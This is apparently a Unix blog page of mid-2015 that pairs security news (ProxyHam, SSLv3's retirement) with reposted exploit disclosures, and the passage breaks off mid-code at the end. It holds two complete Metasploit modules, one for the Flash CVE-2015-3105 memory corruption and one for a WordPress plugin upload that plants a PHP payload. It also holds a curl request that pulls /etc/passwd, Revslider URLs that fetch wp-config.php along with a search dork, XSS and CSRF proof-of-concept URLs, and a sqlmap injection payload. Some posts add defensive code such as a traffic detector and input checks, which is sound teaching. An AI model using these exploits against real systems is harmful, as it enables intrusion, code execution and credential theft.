MondoUnix Unix, Linux, FreeBSD, BSD, GNU, Kernel , RHEL, CentOS, Solaris, AIX, HP-UX, Mac OS X, Tru64, SCO UnixWare, Xenix, HOWTO, NETWORKING, IPV6

3 Jul 2015

ProxyHam, for browsing the Internet anonymously


The open-source device connects to a Wi-Fi network and relays the user's Internet connection over a radio link to a computer 1,600 to 4,000 metres away.

A system that lets the anonymous user sit safely at home, more than 1,600 metres away from his own IP address.
That is ProxyHam, a "hardware proxy" due to be presented at the DefCon hacker conference in Las Vegas in August. The system adds a physical layer of indirection to hide the user's location while browsing: the open-source device connects to a Wi-Fi network and relays the user's Internet traffic over a 900 MHz radio link to a computer 1,600 to 4,000 metres away.

ProxyHam, which its builder Ben Caudill will sell to DefCon attendees, and which he will teach users to build with instructions on his website and a dedicated GitHub page, actually consists of two parts. The first is a box the size of a large dictionary containing a Raspberry Pi computer attached to a Wi-Fi card and a small 900 MHz antenna.
This unit is meant to be planted in a public place; Caudill suggests a dark corner of a library.
At the other end of the radio link, a second 900 MHz antenna plugs into the Ethernet port of the user's own computer.

Caudill believes ProxyHam can protect high-risk users such as dissidents and whistleblowers, for whom tools like VPNs or anonymity software like Tor cannot guarantee sufficient safety.

Sources:

http://www.fastweb.it/internet/proxyham-per-navigare-in-internet-in-anonimato/

http://www.wired.com/2015/07/online-anonymity-box-puts-mile-away-ip-address


28 Jun 2015

That shot you heard? SSLv3 is now DEAD


We really, really, really mean it this time: take SSL3 and bury it.

That's the message from the Internet Engineering Task Force, which has issued the "take it behind the shed" edict in RFC 7568.

It's actually only formalising what the IETF and industry already knew: SSLv3 is ancient and insecure, and its weaknesses underlie attacks like BEAST and POODLE.

Major vendors have been expunging the buggy kludge from their code since last year, but RFC 7568 makes killing it off official IETF policy.

It had already signalled its intent in May, and the new document should only affect the handful of terminally-dozy sysadmins who haven't already patched their systems.

“Pragmatically, clients MUST NOT send a ClientHello with ClientHello.client_version set to {03,00}. Similarly, servers MUST NOT send a ServerHello with ServerHello.server_version set to {03,00}. Any party receiving a Hello message with the protocol version set to {03,00} MUST respond with a "protocol_version" alert message and close the connection.”

The RFC also provides a nice, single source record of what's gone wrong with the protocol in nearly-two-decades of life.

The record layer (where POODLE hit) is broken and can't be fixed; its key exchange is vulnerable to man-in-the-middle attacks when renegotiation or session resumption are used, and can't be fixed; all of its crypto primitives rely on the weak SHA-1 and MD5 hash functions; and it can't take advantage of security features added to recent versions of TLS.
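The MUST clauses quoted from the RFC are straightforward to implement. The following is an added example, not code from the RFC or from the article: a minimal parser for a raw ClientHello record and the server-side decision RFC 7568 requires. The ClientHello bytes are constructed here for the test (fixed random, one placeholder cipher suite). Only ClientHello.client_version is examined, because RFC 5246 obliges a server to accept any {03,xx} record-layer version on a ClientHello, so a {03,00} record version on its own is not evidence of an SSLv3 client.

```python
import struct

HANDSHAKE, ALERT = 22, 21          # TLS ContentType values
CLIENT_HELLO = 1                   # HandshakeType
SSL3 = (3, 0)                      # {03,00}
ALERT_FATAL = 2
PROTOCOL_VERSION = 70              # AlertDescription.protocol_version


def build_client_hello(client_version, record_version=None):
    """Construct a minimal, well-formed ClientHello record (test input, not a real capture)."""
    record_version = record_version or client_version
    body = (bytes(client_version)
            + b"\x00" * 32           # Random: fixed zeros for the example
            + b"\x00"                # empty session_id
            + b"\x00\x02\x00\x2f"    # one cipher suite (TLS_RSA_WITH_AES_128_CBC_SHA)
            + b"\x01\x00")           # one compression method: null
    handshake = bytes([CLIENT_HELLO]) + len(body).to_bytes(3, "big") + body
    return (bytes([HANDSHAKE]) + bytes(record_version)
            + len(handshake).to_bytes(2, "big") + handshake)


def parse_client_hello(record):
    """Return ((rec_major, rec_minor), (cli_major, cli_minor)) from a raw ClientHello record."""
    if len(record) < 11:
        raise ValueError("record too short")
    ctype, rmaj, rmin, rlen = struct.unpack("!BBBH", record[:5])
    if ctype != HANDSHAKE or len(record) < 5 + rlen:
        raise ValueError("not a complete handshake record")
    hs = record[5:5 + rlen]
    if hs[0] != CLIENT_HELLO or int.from_bytes(hs[1:4], "big") + 4 != len(hs):
        raise ValueError("not a well-formed ClientHello")
    return (rmaj, rmin), (hs[4], hs[5])


def rfc7568_response(record):
    """Server-side rule from RFC 7568: a ClientHello whose client_version is {03,00} gets a
    fatal protocol_version alert (the caller then closes the connection); anything else
    returns None and handshake processing continues.  The record-layer version is
    deliberately ignored: RFC 5246 lets a client put any {03,xx} there on its ClientHello."""
    record_version, client_version = parse_client_hello(record)
    if client_version == SSL3:
        # Alert record: ContentType 21, version, length 2, AlertLevel fatal, AlertDescription 70
        return (bytes([ALERT]) + bytes(record_version) + b"\x00\x02"
                + bytes([ALERT_FATAL, PROTOCOL_VERSION]))
    return None
```

A client-side check is the mirror image: inspect ServerHello.server_version and abort on {03,00}. TLS 1.3 clients still put {03,03} in the legacy_version field, so this rule continues to work unchanged in front of a modern stack.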

Farewell, SSLv3, we hope forever.

Source: http://www.theregister.co.uk/2015/06/26/that_shot_you_heard_sslv3_is_now_dead/

28 Jun 2015

Adobe Flash Player Drawing Fill Shader Memory Corruption

##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
 
require 'msf/core'
 
class Metasploit3 < Msf::Exploit::Remote
  Rank = GreatRanking
 
  include Msf::Exploit::Remote::BrowserExploitServer
 
  def initialize(info={})
    super(update_info(info,
      'Name'                => 'Adobe Flash Player Drawing Fill Shader Memory Corruption',
      'Description'         => %q{
        This module exploits a memory corruption happening when applying a Shader as a drawing fill
        as exploited in the wild on June 2015. This module has been tested successfully on:
 
        Windows 7 SP1 (32-bit), IE11 and Adobe Flash 17.0.0.188,
        Windows 7 SP1 (32-bit), Firefox 38.0.5 and Adobe Flash 17.0.0.188,
        Windows 8.1, Firefox 38.0.5 and Adobe Flash 17.0.0.188, and
        Linux Mint "Rebecca" (32 bits), Firefox 33.0 and Adobe Flash 11.2.202.460.
      },
      'License'             => MSF_LICENSE,
      'Author'              =>
        [
          'Chris Evans', # Vulnerability discovery
          'Unknown', # Exploit in the wild
          'juan vazquez' # msf module
        ],
      'References'          =>
        [
          ['CVE', '2015-3105'],
          ['URL', 'https://helpx.adobe.com/security/products/flash-player/apsb15-11.html'],
          ['URL', 'http://blog.trendmicro.com/trendlabs-security-intelligence/magnitude-exploit-kit-uses-newly-patched-adobe-vulnerability-us-canada-and-uk-are-most-at-risk/'],
          ['URL', 'http://malware.dontneedcoffee.com/2015/06/cve-2015-3105-flash-up-to-1700188-and.html'],
          ['URL', 'http://help.adobe.com/en_US/as3/dev/WSFDA04BAE-F6BC-43d9-BD9C-08D39CA22086.html']
        ],
      'Payload'             =>
        {
          'DisableNops' => true
        },
      'Platform'            => ['win', 'linux'],
      'Arch'                => [ARCH_X86],
      'BrowserRequirements' =>
        {
          :source  => /script|headers/i,
          :arch    => ARCH_X86,
          :os_name => lambda do |os|
            os =~ OperatingSystems::Match::LINUX ||
              os =~ OperatingSystems::Match::WINDOWS_7 ||
              os =~ OperatingSystems::Match::WINDOWS_81
          end,
          :ua_name => lambda do |ua|
            case target.name
            when 'Windows'
              return true if ua == Msf::HttpClients::IE || ua == Msf::HttpClients::FF
            when 'Linux'
              return true if ua == Msf::HttpClients::FF
            end
 
            false
          end,
          :flash   => lambda do |ver|
            case target.name
            when 'Windows'
              return true if ver =~ /^17\./ && Gem::Version.new(ver) <= Gem::Version.new('17.0.0.188')
            when 'Linux'
              return true if ver =~ /^11\./ && Gem::Version.new(ver) <= Gem::Version.new('11.2.202.460')
            end
 
            false
          end
        },
      'Targets'             =>
        [
          [ 'Windows',
            {
              'Platform' => 'win'
            }
          ],
          [ 'Linux',
            {
              'Platform' => 'linux'
            }
          ]
        ],
      'Privileged'          => false,
      'DisclosureDate'      => 'May 12 2015',
      'DefaultTarget'       => 0))
  end
 
  def exploit
    @swf = create_swf
 
    super
  end
 
  def on_request_exploit(cli, request, target_info)
    print_status("Request: #{request.uri}")
 
    if request.uri =~ /\.swf$/
      print_status('Sending SWF...')
      send_response(cli, @swf, {'Content-Type'=>'application/x-shockwave-flash', 'Cache-Control' => 'no-cache, no-store', 'Pragma' => 'no-cache'})
      return
    end
 
    print_status('Sending HTML...')
    send_exploit_html(cli, exploit_template(cli, target_info), {'Pragma' => 'no-cache'})
  end
 
  def exploit_template(cli, target_info)
    swf_random = "#{rand_text_alpha(4 + rand(3))}.swf"
    target_payload = get_payload(cli, target_info)
    b64_payload = Rex::Text.encode_base64(target_payload)
    os_name = target_info[:os_name]
 
    if target.name =~ /Windows/
      platform_id = 'win'
    elsif target.name =~ /Linux/
      platform_id = 'linux'
    end
 
    html_template = %Q|<html>
    <body>
    <object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab" width="1" height="1" />
    <param name="movie" value="<%=swf_random%>" />
    <param name="allowScriptAccess" value="always" />
    <param name="FlashVars" value="sh=<%=b64_payload%>&pl=<%=platform_id%>&os=<%=os_name%>" />
    <param name="Play" value="true" />
    <embed type="application/x-shockwave-flash" width="1" height="1" src="<%=swf_random%>" allowScriptAccess="always" FlashVars="sh=<%=b64_payload%>&pl=<%=platform_id%>&os=<%=os_name%>" Play="true"/>
    </object>
    </body>
    </html>
    |
 
    return html_template, binding()
  end
 
  def create_swf
    path = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2015-3105', 'msf.swf')
    swf =  ::File.open(path, 'rb') { |f| swf = f.read }
 
    swf
  end
end


28 Jun 2015

WordPress WP-Instance-Rename 1.0 File Download

Title: Arbitrary File download in wordpress plugin wp-instance-rename v1.0
Author: Larry W. Cashdollar, @_larry0
Date: 2015-06-12
Download Site: https://wordpress.org/plugins/wp-instance-rename/
Vendor: Vlajo
Vendor Notified: 2015-06-12
Advisory: http://www.vapid.dhs.org/advisory.php?v=127
Vendor Contact:
Description: WordPress Rename plugin allows you to easily rename the complete WordPress installation. This plugin allows you to rename WordPress database, WordPress directory, change every necessary configuration file, easily from one page.
Vulnerability:
The code in mysqldump_download.php takes the dump file name straight from the query string and never checks that it lies inside the intended backup directory: whatever path is supplied in dumpfname is zipped and served, so any file the web server process can read can be downloaded:
 
try{
  $dbname   = $_GET["dbname"];
  $dumpfname = $_GET["dumpfname"];
  $backup_folder = $_GET["backup_folder"];  
}catch (Exception $e){}
 
if(empty($backup_folder)){
  $backup_folder="backup/";
}
echo "$dumpfname";
if (file_exists($dumpfname)) {    
  // zip the dump file  
  $name=$dbname . "_" . date("Y-m-d");  
  $zipfname = $backup_folder.$name.".zip";
  $zip = new ZipArchive();  
  if($zip->open($zipfname,ZIPARCHIVE::CREATE)) 
  {
     $zip->addFile($dumpfname,$dumpfname);
     $zip->close();
  }  
  // read zip file and send it to standard output
  if (file_exists($zipfname)) {
    header('Content-Description: File Transfer');
    header('Content-Type: application/octet-stream');
    header('Content-Disposition: attachment; filename='.basename($zipfname));
    flush();
    readfile($zipfname);
 
CVE ID: CVE-2015-4703
OSVDB:
Exploit Code:
  • curl -G --data "dbname=wp&dumpfname=/etc/passwd&backup_folder=." http://www.example.com/wp-instance-rename/mysqldump_download.php -o p.zip
    (the script reads its parameters from $_GET, so -G is needed to put them on the query string; the downloaded archive p.zip contains /etc/passwd)


28 Jun 2015

WordPress Nextend Twitter Connect 1.5.1 Cross Site Scripting

Wordpress “Nextend Twitter Connect”
===================================
Document Title:
===============
WordPress “Nextend Twitter Connect” Plugin Version: 1.5.1 is vulnerable to Reflected XSS (Cross Site Scripting)
 
Download URL:
 
=============
 
https://wordpress.org/plugins/nextend-twitter-connect/
 
Release Date:
 
=============
2015-06-20
 
Vulnerability CVE ID:
 
=====================
CVE-2015-4557
 
Vulnerability Disclosure Timeline:
 
==================================
2015 – 06 – 15 First notified to WordPress.
2015 – 06 – 15 First notified to plugin vendor .
2015 – 06 – 15 First notified to Mitre for CVE number.
2015 – 06 – 16 Vendor publish update for the plugin.
2015 – 06 – 22 Public Disclosure.
 
Discovery Status:
 
=================
 
Published
 
Severity Level:
 
===============
 
High
 
Technical Details, Description & Proof of Concept (PoC):
 
========================================================
 
After installing WordPress I added the plugin "Nextend Twitter Connect", which allows logging in to WordPress with a Twitter account.

During testing I found that the "redirect_to" parameter is vulnerable to reflected XSS:
http://www.siz.co.il/my.php?i=hvmwzqo0tmjw.png

To get to the root of the problem I looked at the plugin source and found the function "new_Twitter_sign_button", located in the file "nextend-Twitter-connect.php".

The problematic code is at line 492:
http://www.siz.co.il/my.php?i=bndijzkozjdy.png

As line 492 shows, the function does not escape HTML tags or other dangerous characters before echoing the parameter back.

When an attacker injects JavaScript through the URL, the function emits it into the page, as shown here:

http://www.siz.co.il/my.php?i=ni4jzmzjmrni.png

and the alert window pops up.
 
 
Solution - Fix & Patch:
 
=======================
 
To fix this flaw, wrap the parameter in the "htmlentities" function (http://php.net/htmlentities) before it is output.
 
As you can see in the image:
http://www.siz.co.il/my.php?i=yjz4jmie4m1g.png
 
 
Wordpress “Nextend Google Connect”
===================================
Document Title:
===============
WordPress “Nextend Google Connect” Plugin Version: 1.5.1 is vulnerable to Reflected XSS (Cross Site Scripting)
 
 
Download URL:
 
=============
 
https://wordpress.org/plugins/nextend-google-connect/
 
 
 
Release Date:
 
=============
2015-06-20
 
 
Vulnerability CVE ID:
 
=====================
CVE-2015-4557
 
 
Vulnerability Disclosure Timeline:
 
==================================
2015 – 06 – 15 First notified to WordPress.
2015 – 06 – 15 First notified to plugin vendor .
2015 – 06 – 15 First notified to Mitre for CVE number.
2015 – 06 – 16 Vendor publish update for the plugin.
2015 – 06 – 22 Public Disclosure.
 
 
Discovery Status:
 
=================
 
Published
 
 
Severity Level:
 
===============
 
High
 
 
Technical Details, Description & Proof of Concept (PoC):
 
========================================================
 
After installing WordPress I added the plugin "Nextend Google Connect", which allows logging in to WordPress with a Google account.

During testing I found that the "redirect_to" parameter is vulnerable to reflected XSS:
http://www.siz.co.il/my.php?i=yzjzqwyn4qo3.png

To get to the root of the problem I looked at the plugin source and found the function "new_google_sign_button", located in the file "nextend-Google-connect.php".

The problematic code is at line 433:
http://www.siz.co.il/my.php?i=z4dnntazxkmz.png

As line 433 shows, the function does not escape HTML tags or other dangerous characters before echoing the parameter back.

When an attacker injects JavaScript through the URL, the function emits it into the page, as shown here:

http://www.siz.co.il/my.php?i=0omtugeig1z0.png

and the alert window pops up.
 
 
Solution - Fix & Patch:
 
=======================
 
To fix this flaw, wrap the parameter in the "htmlentities" function (http://php.net/htmlentities) before it is output.
 
As you can see in the image:
http://sizmedia.com/my.php?i=zmnjdljwthmm.png
 
 
Liran Segal (Bugsec Information Security LTD)
 
Regards,
Liran Segal
Penetration Testing
BugSec Cyber & Information Security


24 Jun 2015

WordPress Front-end Editor File Upload

##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
 
require 'msf/core'
 
class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking
 
  include Msf::HTTP::Wordpress
  include Msf::Exploit::FileDropper
 
  def initialize(info = {})
    super(update_info(
      info,
      'Name'           => 'Wordpress Front-end Editor File Upload',
      'Description'    => %q{
          The Wordpress Front-end Editor plugin contains an authenticated file upload
          vulnerability. Arbitrary files can be uploaded to the upload folder: because
          the plugin uses its own file upload mechanism instead of the WordPress
          API, any file type can be uploaded.
      },
      'Author'         =>
        [
          'Sammy', # Vulnerability discovery
          'Roberto Soares Espreto <robertoespreto[at]gmail.com>'     # Metasploit module
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          ['OSVDB', '83637'],
          ['WPVDB', '7569'],
          ['URL', 'http://www.opensyscom.fr/Actualites/wordpress-plugins-front-end-editor-arbitrary-file-upload-vulnerability.html']
        ],
      'Privileged'     => false,
      'Platform'       => ['php'],
      'Arch'           => ARCH_PHP,
      'Targets'        => [['Front-End Editor 2.2.1', {}]],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Jul 04 2012'))
  end
 
  def check
    check_plugin_version_from_readme('front-end-editor', '2.3')
  end
 
  def exploit
    print_status("#{peer} - Trying to upload payload")
    filename = "#{rand_text_alpha_lower(5)}.php"
 
    print_status("#{peer} - Uploading payload")
    res = send_request_cgi(
      'method'   => 'POST',
      'uri'      => normalize_uri(wordpress_url_plugins, 'front-end-editor', 'lib', 'aloha-editor', 'plugins', 'extra', 'draganddropfiles', 'demo', 'upload.php'),
      'ctype'    => 'application/octet-stream',
      'headers'  => {
        'X-File-Name' => filename
      },
      'data' => payload.encoded
    )
 
    if res
      if res.code == 200
        register_files_for_cleanup(filename)
      else
        fail_with(Failure::Unknown, "#{peer} - Unexpected response, exploit probably failed!")
      end
    else
      fail_with(Failure::Unknown, 'Server did not respond in an expected way')
    end
 
    print_status("#{peer} - Calling uploaded file #{filename}")
    send_request_cgi(
      { 'uri'    => normalize_uri(wordpress_url_plugins, 'front-end-editor', 'lib', 'aloha-editor', 'plugins', 'extra', 'draganddropfiles', 'demo', filename) },
      5
    )
  end
end
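Anyone running this plugin can watch for the module's own traffic pattern: a POST to the Aloha draganddropfiles demo upload.php followed, from the same client, by a GET for a .php file in that same demo/ directory. The detector below is an added example and not part of the Metasploit module. It assumes Apache/nginx combined log format with request paths relative to the site root; the log lines are constructed for the test and use documentation IP ranges.

```python
import re
from datetime import datetime, timedelta

PLUGIN_DEMO_DIR = ("/wp-content/plugins/front-end-editor/lib/aloha-editor/"
                   "plugins/extra/draganddropfiles/demo/")
UPLOAD_ENDPOINT = PLUGIN_DEMO_DIR + "upload.php"

# Combined log format: ip ident user [time] "METHOD path proto" status size "referer" "ua"
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})')


def parse_line(line):
    """Return a dict for one access-log line, or None if it does not match the format."""
    m = LOG_RE.match(line)
    if not m:
        return None
    entry = m.groupdict()
    entry["ts"] = datetime.strptime(entry["ts"], "%d/%b/%Y:%H:%M:%S %z")
    entry["path"] = entry["path"].split("?", 1)[0]   # drop any query string
    return entry


def find_upload_then_execute(lines, window=timedelta(minutes=10)):
    """Return (ip, path) for every GET of a .php file under demo/ that follows, within
    `window`, a POST to upload.php from the same client IP. Unparseable lines are skipped."""
    last_upload = {}   # client ip -> timestamp of its most recent upload POST
    hits = []
    for e in filter(None, (parse_line(l) for l in lines)):
        if e["method"] == "POST" and e["path"] == UPLOAD_ENDPOINT:
            last_upload[e["ip"]] = e["ts"]
        elif (e["method"] == "GET" and e["path"].startswith(PLUGIN_DEMO_DIR)
              and e["path"].endswith(".php") and e["path"] != UPLOAD_ENDPOINT):
            t = last_upload.get(e["ip"])
            if t is not None and timedelta(0) <= e["ts"] - t <= window:
                hits.append((e["ip"], e["path"]))
    return hits


# Constructed sample log (documentation IP ranges; not a real capture).
SAMPLE_LOG = [
    '198.51.100.7 - - [24/Jun/2015:10:01:02 +0000] "POST ' + UPLOAD_ENDPOINT + ' HTTP/1.1" 200 12 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [24/Jun/2015:10:01:03 +0000] "GET ' + PLUGIN_DEMO_DIR + 'kqzpa.php HTTP/1.1" 200 0 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [24/Jun/2015:10:05:00 +0000] "GET ' + PLUGIN_DEMO_DIR + 'index.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [24/Jun/2015:11:30:00 +0000] "GET ' + PLUGIN_DEMO_DIR + 'kqzpa.php HTTP/1.1" 200 0 "-" "Mozilla/5.0"',
    'garbage line that should be ignored',
]
```

The two-step correlation keeps the rule quiet on ordinary traffic, but a demo upload endpoint has no business being reachable on a production site at all, so a bare alert on any POST to upload.php is a reasonable stricter rule.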


24 Jun 2015

WordPress Revslider 4.2.2 XSS / Information Disclosure

| # Title    : WordPress Revslider 4.2.2 Multi Vulnerability
| # Author   : indoushka                                                               
| # email  :indoushka4ever@gmail.com                                                                                                                                                                 
| # Dork     : inurl:admin-ajax.php?action=revslider_show_image -intext:"revslider_show_image"
| # Tested on: windows 8.1 Français V.(Pro)        
| # Download : http://revolution.themepunch.com/                                                  
=======================================
 
XSS :
 
http://www.codekom.com//wp-admin/admin-ajax.php?action=revslider_ajax_action&client_action=%3Cmarquee%3E%3Cfont%20color=lime%20size=32%3EHacked%20by%20indoushka..Give%20me%20your%20wp-config.php
 
Information Disclosure :
 
http://www.codekom.com/wp-content/plugins/revslider/revslider_admin.php
 
http://www.codekom.com/wp-admin/admin-ajax.php?action=revslider_ajax_action&client_action=get_captions_css
 
Arbitrary File Download Exploit :
 
http://bh-3.com/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
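This Revslider img=../wp-config.php request and the WP-Instance-Rename dumpfname=/etc/passwd request earlier on this page are the same defect: a user-supplied path reaches file_exists()/readfile() without any check that it stays inside the directory the feature is meant to serve. The containment check below is an added example, not code from either plugin; it is Python rather than PHP, builds a throwaway directory tree of its own, and the file names in it are hypothetical.

```python
import os
import tempfile


class PathTraversal(ValueError):
    """Raised when a requested name would resolve outside the permitted directory."""


def resolve_within(base_dir, requested):
    """Return the absolute path for `requested` only if it resolves inside `base_dir`.
    Resolution goes through realpath(), so '../' segments, absolute paths and symlinks
    that point out of the directory are all caught by a single prefix comparison."""
    base = os.path.realpath(base_dir)
    # os.path.join() discards `base` entirely when `requested` is absolute; that is
    # exactly why dumpfname=/etc/passwd sails through a bare file_exists() check.
    candidate = os.path.realpath(os.path.join(base, requested))
    if candidate != base and not candidate.startswith(base + os.sep):
        raise PathTraversal(requested)
    return candidate


def classify(base_dir, names):
    """Map each requested name to 'ok' or 'rejected' (driver for the demo below)."""
    result = {}
    for name in names:
        try:
            resolve_within(base_dir, name)
            result[name] = "ok"
        except PathTraversal:
            result[name] = "rejected"
    return result


def demo():
    """Build a constructed site layout in a temp dir and run the page's attack inputs against it."""
    with tempfile.TemporaryDirectory() as root:
        backup = os.path.join(root, "backup")            # the intended download directory
        os.mkdir(backup)
        open(os.path.join(backup, "wp_2015-06-12.sql"), "w").close()   # legitimate dump (constructed)
        open(os.path.join(root, "wp-config.php"), "w").close()         # the file an attacker wants
        os.symlink(os.path.join(root, "wp-config.php"), os.path.join(backup, "latest"))
        return classify(backup, [
            "wp_2015-06-12.sql",           # normal request
            "/etc/passwd",                 # the WP-Instance-Rename PoC
            "../wp-config.php",            # the Revslider img= PoC
            "backup/../../wp-config.php",  # traversal hidden behind a plausible prefix
            "latest",                      # symlink inside backup/ that points outside it
        ])
```

Containment is the minimum, not the whole fix: an endpoint that hands out database dumps or arbitrary images should also require an authenticated, authorised caller, and where the set of legitimate files is known (one dump per database name) an allow-list of exact names beats any path check.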
 
Greetz : 
jericho  http://attrition.org & http://www.osvdb.org/ * packetstormsecurity.com * http://is-sec.org/cc/
Hussin-X * Stake (www.v4-team.com) * D4NB4R * ViRuS_Ra3cH * yasMouh * https://www.corelan.be * exploit4arab.net
---------------------------------------------------------------------------------------------------------------


24 Jun 2015

WordPress Google Analyticator 6.4.9.3 CSRF

# Title: Cross-Site Request Forgery in Google Analyticator Wordpress Plugin
v6.4.9.3 before rev @1183563
# Submitter: Nitin Venkatesh
# Product: Google Analyticator Wordpress Plugin
# Product URL: https://wordpress.org/plugins/google-analyticator/
# Vulnerability Type: Cross-Site Request Forgery [CWE-352]
# Affected Versions: v6.4.9.3 before rev @1183563 and possibly earlier
# Tested versions: v6.4.9.3 rev @1168849
# Fixed Version: v6.4.9.3 rev @1183563
# Link to code diff: https://plugins.trac.wordpress.org/changeset/1183563/
# CVE Status: None/Unassigned/Fresh
 
## Product Information:
 
Google Analyticator makes it super easy to view Google Analytics within your WordPress dashboard. This eliminates the need to edit your template code to begin logging. Google Analyticator also includes several widgets for displaying Analytics data in the admin and on your blog.
 
One of the most popular WordPress plugins for Google Analytics! Over 3.5+ million downloads.
 
## Vulnerability Description:
 
The plugin's administrative actions (clearing its cached Analytics data, resetting its settings) are not protected against cross-site request forgery: a logged-in administrator who opens an attacker-controlled page can be made to issue them, disrupting the functionality the plugin provides.
 
## Proof-of-Concept:
 
http://localhost/wp-admin/options-general.php?page=google-analyticator.php&pageaction=ga_clear_cache
 
http://localhost/wp-admin/options-general.php?page=ga_reset
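Either PoC URL runs as soon as a logged-in administrator's browser fetches it, for instance from an <img src> on another site, because nothing ties the request to an action the administrator actually chose. The added example below is Python, not the plugin's code, and is a simplified stand-in for WordPress's wp_create_nonce()/check_admin_referer() (real WordPress nonces are additionally bound to a time window and the user ID). It contrasts the unprotected handler with one that demands a per-session, per-action token; the request dicts and cache state are constructed for the test.

```python
import hashlib
import hmac
import secrets

ACTION = "ga_clear_cache"


class Session:
    """One logged-in administrator. The secret never leaves the server."""

    def __init__(self):
        self._secret = secrets.token_bytes(32)

    def nonce(self, action):
        """Per-session, per-action token (simplified: real WordPress nonces also expire)."""
        return hmac.new(self._secret, action.encode(), hashlib.sha256).hexdigest()[:16]


def handle_vulnerable(session, query, state):
    """Runs the action for any request that names it. An <img src="...pageaction=ga_clear_cache">
    on an attacker's page is enough, since the browser attaches the admin's cookies for free."""
    if query.get("pageaction") == ACTION:
        state["cache"].clear()
        return 200
    return 400


def handle_protected(session, query, state):
    """Same action, but the request must carry the token that only the legitimate settings
    page could have embedded. compare_digest keeps the comparison constant-time."""
    if query.get("pageaction") != ACTION:
        return 400
    if not hmac.compare_digest(query.get("_wpnonce", ""), session.nonce(ACTION)):
        return 403          # forged or cross-session request: state untouched
    state["cache"].clear()
    return 200


def admin_page_link(session):
    """What the plugin's own settings page would emit for its 'clear cache' button."""
    return ("options-general.php?page=google-analyticator.php"
            f"&pageaction={ACTION}&_wpnonce={session.nonce(ACTION)}")
```

A nonce is what the fixed revision needs at minimum; moving state-changing actions from GET to POST is the other half, since a GET that mutates state is also triggered by prefetchers and link previews with no attacker involved.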
 
## Solution:
 
Upgrade to v6.4.9.3 rev @1183563
 
## Disclosure Timeline:
 
2015-05-30 - Contacted developer via forums.
2015-06-02 - Vulnerability details submitted on the forums on developer's request - https://wordpress.org/support/topic/discovered-security-vulnerabilities-1
2015-06-13 - Re-contacted developer on the forums.
2015-06-18 - Update released.
2015-06-19 - Publishing to Full Disclosure mailing list
 
## Disclaimer:
 
This disclosure is purely meant for educational purposes. I will in no way be responsible as to how the information in this disclosure is used.


19 Jun 2015

WordPress NewStatPress 0.9.8 Cross Site Scripting / SQL Injection

# Title: Multiple vulnerabilities in WordPress plugin "NewStatPress"
# Author: Adrián M. F. - adrimf85[at]gmail[dot]com
# Date: 2015-05-25
# Vendor Homepage: https://wordpress.org/plugins/newstatpress/
# Active installs: 20,000+
# Vulnerable version: 0.9.8
# Fixed version: 0.9.9
# CVE: CVE-2015-4062, CVE-2015-4063
 
 Vulnerabilities (2)
=====================
 
(1) Authenticated SQLi [CWE-89] (CVE-2015-4062)
-----------------------------------------------
 
* CODE:
includes/nsp_search.php:94
+++++++++++++++++++++++++++++++++++++++++
for($i=1;$i<=3;$i++) {
    if(($_GET["what$i"] != '') && ($_GET["where$i"] != '')) {
        $where.=" AND ".$_GET["where$i"]." LIKE '%".$_GET["what$i"]."%'";
    }
}
+++++++++++++++++++++++++++++++++++++++++
 
* POC:
http://[domain]/wp-admin/admin.php?where1=agent[SQLi]&limitquery=1&searchsubmit=Buscar&page=nsp_search
 
SQLMap
+++++++++++++++++++++++++++++++++++++++++
./sqlmap.py --cookie="[cookie]" --dbms mysql -u "http://[domain]/wp-admin/admin.php?where1=agent&limitquery=1&searchsubmit=Buscar&page=nsp_search" -p where1
[............]
GET parameter 'where1' is vulnerable. Do you want to keep testing the others (if any)? [y/N] 
sqlmap identified the following injection points with a total of 89 HTTP(s) requests:
---
Parameter: where1 (GET)
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: where1=agent AND (SELECT * FROM (SELECT(SLEEP(5)))Guji)&limitquery=1&searchsubmit=Buscar&page=nsp_search
---
[12:25:59] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian 7.0 (wheezy)
web application technology: Apache 2.2.22, PHP 5.4.39
back-end DBMS: MySQL 5.0.12
+++++++++++++++++++++++++++++++++++++++++
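The single line that matters is the string concatenation in the loop quoted above: both the column name (where$i) and the search term (what$i) are pasted into the SQL. The two need different fixes, and the added example below (Python with an in-memory SQLite table, not the plugin's code) shows them side by side: the value is passed as a bound parameter, while the column name, which no database driver can bind, is checked against an allow-list of the columns the search form actually offers. The column list and table are hypothetical; the injection strings are the kind the sqlmap run above would drive through this loop.

```python
import sqlite3

# Columns the search form is allowed to filter on (hypothetical list for the example).
ALLOWED_COLUMNS = {"agent", "os", "referrer"}


def build_where_vulnerable(params):
    """Same shape as the plugin's loop: both the column name and the value are spliced in."""
    where = "1=1"
    for i in range(1, 4):
        what, col = params.get(f"what{i}", ""), params.get(f"where{i}", "")
        if what != "" and col != "":
            where += f" AND {col} LIKE '%{what}%'"
    return where, []


def build_where_safe(params):
    """The value becomes a bound parameter. The column name cannot be bound, so it is
    checked against the allow-list and the request is rejected if it is not a known column."""
    clauses, args = [], []
    for i in range(1, 4):
        what, col = params.get(f"what{i}", ""), params.get(f"where{i}", "")
        if what == "" or col == "":
            continue
        if col not in ALLOWED_COLUMNS:
            raise ValueError(f"unknown search column: {col!r}")
        clauses.append(f"{col} LIKE ?")
        args.append(f"%{what}%")
    return " AND ".join(clauses) or "1=1", args


def sample_db():
    """Constructed stand-in for the plugin's visits table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE visits (agent TEXT, os TEXT, referrer TEXT)")
    conn.executemany("INSERT INTO visits VALUES (?, ?, ?)", [
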